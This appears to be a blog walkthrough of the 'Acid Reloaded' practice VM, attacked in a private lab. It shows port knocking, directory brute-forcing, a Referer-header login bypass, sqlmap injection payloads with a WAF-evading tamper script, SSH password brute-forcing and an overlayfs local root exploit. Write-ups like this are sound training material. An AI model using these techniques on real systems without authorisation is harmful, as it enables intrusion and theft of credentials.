We know that there are many ways to gain access to a server out there. We can use several known exploits, unknown 0days and even social engineer to access. These activities are also all depending on training. A good way to train are Capture the Flag events and vulnerable systems which are made to be vulnerable. As CTF events are mostly event and time based I’m focusing on the second way, using vulnerable systems. A good place to gain some is VulnOS, the systems are served there as virtual machines. So it’s easy to embed them.
I will focus in this post on the vulnerable machine Acid Reloaded, as it was really fun to solve it.
Table of contents
- Setting it up
- Gather information
- The webserver
- SQLi it!
- We need to get deepar!
- Brute force it
- Inside the system
- Conclusion
Setting it up
Setting it up is fairly easy. Just download it (best way is via Torrent as the bandwidth is limited for the website). Unzip it and you have a folder with VMWare virtual disks. You can easily embed them in VMWare Workstation or Oracle Virtual Box. I converted the disk to a proper Virtual Box format. For that, create a new VM with Linux settings, then go to the mediums manager and convert it to .vdi, I also marked it there then as read only, so no changes will be saved and I am able to shoot it up. Also I put it into an internal network of Virtual Box, with a slim Debian server which is acting as DHCP and DNS server. For the pentesting purpose I’ll use Kali Linux.
Gather information
First thing to do is get down which IP the VM uses. Yes we can simple look at the DHCP server, but why… 
[email protected]:~# nmap -sP 192.168.1.0/24
Starting Nmap 7.12 ( https://nmap.org ) at 2016-05-22 20:12 CEST
Nmap scan report for 192.168.1.100
Host is up (0.00063s latency).
MAC Address: 08:00:27:97:4A:32 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.1.254
Host is up (0.00051s latency).
MAC Address: 08:00:27:69:BC:A0 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.1.1
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 5.36 seconds
Okay, the VM uses 192.168.1.100 as it’s IP. Let’s scan it:
[email protected]:~# nmap -sS -sV 192.168.1.100
Starting Nmap 7.12 ( https://nmap.org ) at 2016-05-22 20:14 CEST
Nmap scan report for 192.168.1.100
Host is up (0.00036s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Ubuntu 5ubuntu1.3 (Ubuntu Linux; protocol 2.0)
MAC Address: 08:00:27:97:4A:32 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.62 seconds
Port :22 is open with listening SSH on it, time to connect to it:
[email protected]:~# ssh [email protected]
_ ____ ___ ____ ____ _____ _ ___ _ ____ _____ ____
/ \ / ___|_ _| _ \ | _ \| ____| | / _ \ / \ | _ \| ____| _ \
/ _ \| | | || | | |_____| |_) | _| | | | | | |/ _ \ | | | | _| | | | |
/ ___ \ |___ | || |_| |_____| _ <| |___| |__| |_| / ___ \| |_| | |___| |_| |
/_/ \_\____|___|____/ |_| \_\_____|_____\___/_/ \_\____/|_____|____/
-by Acid
Wanna Knock me out ???
3.2.1 Let's Start the Game.
[email protected]'s password:
Permission denied, please try again.
[email protected]'s password:
Hrmm, okay. So we have a SSH server here with a nice ASCII art banner. And a login. Shall we bruteforce? Shall we exploit? Nah, I think there has to be some other way. So let’s scan it again, this time deeper, with all ports.
[email protected]:~# nmap -p1-65535 -sV -T4 192.168.1.100
Starting Nmap 7.12 ( https://nmap.org ) at 2016-05-22 20:28 CEST
Nmap scan report for 192.168.1.100
Host is up (0.00022s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Ubuntu 5ubuntu1.3 (Ubuntu Linux; protocol 2.0)
33447/tcp filtered unknown
MAC Address: 08:00:27:97:4A:32 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3.81 seconds
Okay, we have another port, 33447. It’s filtered and we cannot reach it. Let’s lean back and drink a cup of coffee/tea. Hrmmm…. Do you remember the banner of SSH? There is Knock written, with a capital letter. And 3, 2, 1. To start the game.
Do you know port knocking? It’s a way to restrict access to a port. Other ports have to be “triggered”, so a firewall (like iptables) adds the own IP to allow rules. And this “3, 2, 1” looks like a sequence. Let’s try it:
[email protected]:~# for i in {3..1}; do nmap -Pn --host_timeout 100 --max-retries 0 -p $i 192.168.1.100; done && nmap -p1-65535 -sV -T4 192.168.1.100
Starting Nmap 7.12 ( https://nmap.org ) at 2016-05-22 20:54 CEST
Nmap scan report for 192.168.1.100
Host is up (0.00033s latency).
PORT STATE SERVICE
3/tcp closed compressnet
MAC Address: 08:00:27:97:4A:32 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.14 seconds
Starting Nmap 7.12 ( https://nmap.org ) at 2016-05-22 20:54 CEST
Nmap scan report for 192.168.1.100
Host is up (0.00023s latency).
PORT STATE SERVICE
2/tcp closed compressnet
MAC Address: 08:00:27:97:4A:32 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.15 seconds
Starting Nmap 7.12 ( https://nmap.org ) at 2016-05-22 20:54 CEST
Nmap scan report for 192.168.1.100
Host is up (0.00023s latency).
PORT STATE SERVICE
1/tcp closed tcpmux
MAC Address: 08:00:27:97:4A:32 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.16 seconds
Starting Nmap 7.12 ( https://nmap.org ) at 2016-05-22 20:54 CEST
Nmap scan report for 192.168.1.100
Host is up (0.00025s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Ubuntu 5ubuntu1.3 (Ubuntu Linux; protocol 2.0)
33447/tcp open http Apache httpd 2.4.10 ((Ubuntu))
MAC Address: 08:00:27:97:4A:32 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.39 seconds
Wow, as we see, the port opened! 
The webserver
Let’s open it in a browser!
Okay, we shall use our brain. Well, we are already doing, so we are on a good way I assume. The image is in /images/, but this gives a 403 Forbidden error. We have to keep on that trail and gain more information. to do this we should bruteforce the directory of the webserver. I am using dirsearch1 here, it’s a nice Python based app to scan webservers.
[email protected]:~/dirsearch# ./dirsearch.py -u "http://192.168.1.100:33447/" -e php,js -x 403
_|. _ _ _ _ _ _|_ v0.3.6
(_||| _) (/_(_|| (_| )
Extensions: php, js | Threads: 10 | Wordlist size: 5537
Error Log: /root/dirsearch/logs/errors-16-05-22_21-33-51.log
Target: http://192.168.1.100:33447/
[21:33:51] Starting:
[21:33:58] 301 - 321B - /bin -> http://192.168.1.100:33447/bin/
[21:33:58] 200 - 1KB - /bin/
[21:33:59] 301 - 321B - /css -> http://192.168.1.100:33447/css/
[21:34:01] 301 - 322B - /html -> http://192.168.1.100:33447/html/
[21:34:01] 301 - 324B - /images -> http://192.168.1.100:33447/images/
[21:34:01] 200 - 682B - /index.html
Task Completed
Okay, so we have 3 more directories there, let’s get to /bin.
Interesting, a login form. Shall we penetrate it? Well, let’s dig more into /bin/:
[email protected]:~/dirsearch# ./dirsearch.py -u "http://192.168.1.100:33447/bin/" -e php,js -x 403
_|. _ _ _ _ _ _|_ v0.3.6
(_||| _) (/_(_|| (_| )
Extensions: php, js | Threads: 10 | Wordlist size: 5537
Error Log: /root/dirsearch/logs/errors-16-05-22_22-03-56.log
Target: http://192.168.1.100:33447/bin/
[22:03:56] Starting:
[22:03:56] 301 - 324B - /bin/js -> http://192.168.1.100:33447/bin/js/
[22:03:56] 200 - 17B - /bin/.gitignore
[22:04:04] 301 - 327B - /bin/crack -> http://192.168.1.100:33447/bin/crack/
[22:04:04] 301 - 325B - /bin/css -> http://192.168.1.100:33447/bin/css/
[22:04:04] 200 - 675B - /bin/dashboard.php
[22:04:06] 301 - 330B - /bin/includes -> http://192.168.1.100:33447/bin/includes/
[22:04:06] 200 - 1KB - /bin/index.php
[22:04:06] 200 - 1KB - /bin/index.php/login/
[22:04:06] 301 - 324B - /bin/js -> http://192.168.1.100:33447/bin/js/
[22:04:09] 301 - 328B - /bin/styles -> http://192.168.1.100:33447/bin/styles/
Task Completed
Okay, we have here a dashboard.php, that looks promising. But it isn’t. Let’s waste more time and try to exploit the login form with SQLi via sqlmap, but all we get is:
[22:25:47] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')
So, SQLi won’t work, too. Damn it. I think it’s the first time for a pause and think about it. 
OK, after stroking the cat and watching two Mr. Robot episodes I am thinking about HTTP Headers and the funny dog picture at dashboard.php. This has to be the trail, let’s test a view things and play with HTTP headers. I assume header Host: won’t really help. Bah, still no clue. I asked in VulnHub channel in Freenode and someone gave me the hint to use Referer:. Yes, this was kinda cheating, but I was really frustrated, so I put some social in it (aka asking). And after some playing with curl I got that:
[email protected]:~/dirsearch# curl --referer "http://192.168.1.100:33447/bin/includes/validation.php" http://192.168.1.100:33447/bin/dashboard.php
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<link rel="stylesheet" href="crack/css/style.css">
<link rel="stylesheet" href="styles/main.css" />
<title>Acid-Reloaded</title>
</head>
<body>
<div class="wrapper">
<div class="container">
<center><p> <h1>Congratulations </p>
<p>You have bypassed login panel successfully.</h1> <br> </center></p>
<center><p><h3>Come'on bang your head here. <a href="l33t_haxor.php">Click</a>.</h3></p>
<p><h3>If you are done, please <a href="includes/logout.php">log out</a>.</h3></p></center>
</body>
</html>
Bam, this looks promising. we have two new files here! l33t_haxor.php and includes/logout.php. Let’s look what the first one will show us.
SQLi it!
Yes, that’s how we look like at the moment, we had a success. But this could not be all, so let’s look at the source. We see a empty link there: <a href="l33t_haxor.php?id=" style="text-decoration:none"></a>, with an parameter. Could it be? COULD IT BE??!!! Let’s SQLi it!
WOOT?? There is some WAF2 there? Let’s test it a bit more:
Wababadabam, it is inject-able. Let’s fire up sqlmap because we are lazy (yes, yes, could be injected by hand, but for what are computers invented?). With simple firing the URL in paramater -u it says it’s not inject-able. Remember the problem before? It actually looks like there is some WAF. Hrmm, look at this site. it says:
tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor
So let’s use all these scripts and test it, each after one and another. The tamper script which is working is space2comment. The working command is:
sqlmap -u "http://192.168.1.100:33447/bin/l33t_haxor.php?id=1" --dbs --tamper=space2comment
This gives us this data:
[23:05:09] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 69 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1') AND 9245=9245 AND ('OLGc'='OLGc
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=1') AND (SELECT 1120 FROM(SELECT COUNT(*),CONCAT(0x7178787671,(SELECT (ELT(1120=1120,1))),0x7171627171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('siRj'='siRj
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=1') AND (SELECT * FROM (SELECT(SLEEP(5)))ZKtE) AND ('SFwj'='SFwj
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: id=-6050') UNION ALL SELECT NULL,CONCAT(0x7178787671,0x4f4e506b497553466867656350785855504a77645851696952736d644c444e484747764a48726a4b,0x7171627171)#
---
[23:05:12] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[23:05:12] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.10
back-end DBMS: MySQL 5.0
[23:05:12] [INFO] fetching database names
[23:05:12] [INFO] the SQL query used returns 4 entries
[23:05:12] [INFO] retrieved: information_schema
[23:05:12] [INFO] retrieved: mysql
[23:05:12] [INFO] retrieved: performance_schema
[23:05:12] [INFO] retrieved: secure_login
available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] secure_login
Now we have to swing from one node to another, like Tarzan.
I won’t post here all what I found, just the relevant data.
Database: secure_login
[4 tables]
+-----------------+
| UB3R/strcpy.exe |
| login_attempts |
| members |
| word |
+-----------------+
We need to get deepar!
The tables are empty. So we have to take that information and do something with it. I just take that UB3R/strcpy.exe as a hint, maybe a path, so I test it on the webserver. And http://192.168.1.100:33447/UB3R/strcpy.exe worked. Downloaded it. As I’m a member of MalwareMustDie and due this I have to handle much malware, I’m always curious and check the mime of a file.
[email protected]:~/Downloads# file strcpy.exe
strcpy.exe: PDF document, version 1.5
No PE, but a PDF. Okay…
[email protected]:~/Downloads# pdfinfo strcpy.exe
Author: Avinash Thapa
Creator: Microsoft® Word 2013
Producer: Microsoft® Word 2013
CreationDate: Sun Aug 23 18:23:14 2015
ModDate: Sun Aug 23 18:23:14 2015
Tagged: yes
UserProperties: no
Suspects: no
Form: none
JavaScript: no
Pages: 1
Encrypted: no
Page size: 595.32 x 841.92 pts (A4)
Page rot: 0
File size: 168187 bytes
Optimized: no
PDF version: 1.5
Extracting data out of it gave me that:
I will show only the relevant data again:
[email protected]:~/Downloads# strings strcpy.exe
%%EOFRar!
acid.txt
You are at right track.
Don't loose hope..
Good Luck :-)
Kind & Best Regards,
Acid
lol.jpg
Lol, wat, %%EOFRar!. Is there a RAR archive in it?
[email protected]:~/Downloads# unrar e strcpy.exe
UNRAR 5.30 beta 2 freeware Copyright (c) 1993-2015 Alexander Roshal
Extracting from strcpy.exe
Extracting acid.txt OK
Extracting lol.jpg OK
All OK
[email protected]:~/Downloads# cat acid.txt
You are at right track.
Don't loose hope..
Good Luck :-)
Kind & Best Regards,
Acid
Nice! Let’s look at lol.jpg. It’s getting a routine 
[email protected]:~/Downloads# unrar e lol.jpg
UNRAR 5.30 beta 2 freeware Copyright (c) 1993-2015 Alexander Roshal
Extracting from lol.jpg
Extracting Avinash.contact OK
Extracting hint.txt OK
All OK
[email protected]:~/Downloads# cat hint.txt
You have found a contact. Now, go and grab the details :-)
Okay, let’s look at the contact.
[email protected]:~/Downloads# cat Avinash.contact
<?xml version="1.0" encoding="UTF-8"?>
<c:contact c:Version="1" xmlns:c="http://schemas.microsoft.com/Contact" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:MSP2P="http://schemas.microsoft.com/Contact/Extended/MSP2P" xmlns:MSWABMAPI="http://schemas.microsoft.com/Contact/Extended/MSWABMAPI">
<c:CreationDate>2015-08-23T11:39:18Z</c:CreationDate>
<c:Extended>
<MSWABMAPI:PropTag0x3A58101F c:ContentType="binary/x-ms-wab-mapi" c:type="binary">AQAAABIAAABOAG8AbwBCAEAAMQAyADMAAAA=</MSWABMAPI:PropTag0x3A58101F>
</c:Extended>
<c:ContactIDCollection>
<c:ContactID c:ElementID="599ef753-f77f-4224-8700-e551bdc2bb1e">
<c:Value>0bcf610e-a7be-4f26-9042-d6b3c22c9863</c:Value>
</c:ContactID>
</c:ContactIDCollection>
<c:EmailAddressCollection>
<c:EmailAddress c:ElementID="0745ffd4-ef0a-4c4f-b1b6-0ea38c65254e">
<c:Type>SMTP</c:Type>
<c:Address>[email protected]</c:Address>
<c:LabelCollection><c:Label>Preferred</c:Label></c:LabelCollection>
</c:EmailAddress>
<c:EmailAddress c:ElementID="594eec25-47bd-4290-bd96-a17448f7596a" xsi:nil="true"/>
</c:EmailAddressCollection>
<c:NameCollection>
<c:Name c:ElementID="318f9ce5-7a08-4ea0-8b6a-2ce3e9829ff2">
<c:FormattedName>Avinash</c:FormattedName>
<c:GivenName>Avinash</c:GivenName>
</c:Name>
</c:NameCollection>
<c:PersonCollection>
<c:Person c:ElementID="865f9eda-796e-451a-92b1-bf8ee2172134">
<c:FormattedName>Makke</c:FormattedName>
<c:LabelCollection><c:Label>wab:Spouse</c:Label></c:LabelCollection>
</c:Person>
</c:PersonCollection>
<c:PhotoCollection><c:Photo c:ElementID="2fb5b981-cec1-45d0-ae61-7c340cfb3d72">
<c:LabelCollection>
<c:Label>UserTile</c:Label>
</c:LabelCollection>
</c:Photo></c:PhotoCollection>
</c:contact>
Here are some strings of interest:
AQAAABIAAABOAG8AbwBCAEAAMQAyADMAAAA=
[email protected]
Avinash
Makke
wab:Spouse
The first sting looks like base64 encoded:
[email protected]:~/Downloads# echo AQAAABIAAABOAG8AbwBCAEAAMQAyADMAAAA= | base64 --decode
[email protected]
Brute force it
Okay, one more string. Remember the SSH login before? These strings look like passwords, so let’s fire up patator. I made a wordlist.txt with the strings above. Giving the same FILE0 to password and user won’t work in patator, you need to read it again with another indicator.
[email protected]:~/VulnOS/Acid# patator ssh_login host=192.168.1.100 port=22 0=wordlist.txt 1=wordlist.txt user=FILE0 password=FILE1 -x ignore:mesg='Authentication failed.'
23:58:46 patator INFO - Starting Patator v0.6 (http://code.google.com/p/patator/) at 2016-05-22 23:58 CEST
23:58:46 patator INFO -
23:58:46 patator INFO - code size time | candidate | num | mesg
23:58:46 patator INFO - -----------------------------------------------------------------------------
00:00:03 patator INFO - 0 39 0.044 | makke:[email protected] | 66 | SSH-2.0-OpenSSH_6.7p1 Ubuntu-5ubuntu1.3
00:01:06 patator INFO - Hits/Done/Skip/Fail/Size: 1/121/0/0/121, Avg: 0 r/s, Time: 0h 2m 19s
Let’s login and look around.
Inside the system
[email protected]:~/VulnOS/Acid# ssh [email protected]
_ ____ ___ ____ ____ _____ _ ___ _ ____ _____ ____
/ \ / ___|_ _| _ \ | _ \| ____| | / _ \ / \ | _ \| ____| _ \
/ _ \| | | || | | |_____| |_) | _| | | | | | |/ _ \ | | | | _| | | | |
/ ___ \ |___ | || |_| |_____| _ <| |___| |__| |_| / ___ \| |_| | |___| |_| |
/_/ \_\____|___|____/ |_| \_\_____|_____\___/_/ \_\____/|_____|____/
-by Acid
Wanna Knock me out ???
3.2.1 Let's Start the Game.
[email protected]'s password:
Welcome to Ubuntu 15.04 (GNU/Linux 3.19.0-15-generic i686)
* Documentation: https://help.ubuntu.com/
Last login: Mon Aug 24 21:25:34 2015 from 192.168.88.236
[email protected]:~$ ls
[email protected]:~$ ls -al
total 32
drwxr-xr-x 3 makke makke 4096 Aug 24 2015 .
drwxr-xr-x 4 root root 4096 Aug 24 2015 ..
-rw------- 1 makke makke 205 Aug 24 2015 .bash_history
-rw-r--r-- 1 makke makke 220 Aug 24 2015 .bash_logout
-rw-r--r-- 1 makke makke 3760 Aug 24 2015 .bashrc
drwx------ 2 makke makke 4096 Aug 24 2015 .cache
-rw-rw-r-- 1 makke makke 40 Aug 24 2015 .hint
-rw-r--r-- 1 makke makke 675 Aug 24 2015 .profile
[email protected]:~$ cat .hint
Run the executable to own kingdom :-)
[email protected]:~$ cat .bash_history
exit
cd ..
clear
cd /
ls
cd bin/
clear
./overlayfs
clear
cd /home/makke/
clear
nano .hint
clear
ls
clear
ls
ls -a
cat .hint
clear
cd /bin/
ls
./overlayfs
clear
wgt
wget
apt-get remove wget
su
su -
exit
[email protected]:~$
Run the executable to own kingdom :-)
Okay. There is ./overlayfs in the history. Maybe that is our ELF?
[email protected]:/bin$ ./overlayfs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# whoami
root
Yay, we have root! 
# cd /root
# ls -al
total 68
drwx------ 5 root root 4096 Aug 24 2015 .
drwxr-xr-x 22 root root 4096 Aug 24 2015 ..
-rw------- 1 root root 23934 Aug 24 2015 .bash_history
-rw-r--r-- 1 root root 3135 Aug 8 2015 .bashrc
drwx------ 2 root root 4096 Aug 24 2015 .cache
drwx------ 3 root root 4096 Aug 6 2015 .config
drwx------ 3 root root 4096 Aug 6 2015 .dbus
-rw-r--r-- 1 root root 284 Aug 24 2015 .flag.txt
-rw------- 1 root root 2775 Aug 24 2015 .mysql_history
-rw------- 1 root root 147 Aug 24 2015 .nano_history
-rw-r--r-- 1 root root 140 Feb 20 2014 .profile
-rw-r--r-- 1 root root 66 Aug 6 2015 .selected_editor
# cat .flag.txt
Dear Hax0r,
You have completed the Challenge Successfully.
Your Flag is : "[email protected]@Ice-Cream"
Kind & Best Regards
-ACiD
Twitter:https://twitter.com/m_avinash143
Facebook: https://www.facebook.com/M.avinash143
LinkedIN: https://in.linkedin.com/pub/avinash-thapa/101/406/4b5
Oh yay, we made it! It’s our flag now! Hooray!
Conclusion
As we see, many puzzle pieces have to put together. Also there is no golden path, there are many ways to gain the flag, this is just one of them. I hope I teached you some nice techniques here and you had as much fun as me. This virtual machine was really fun. Thank you Acid!
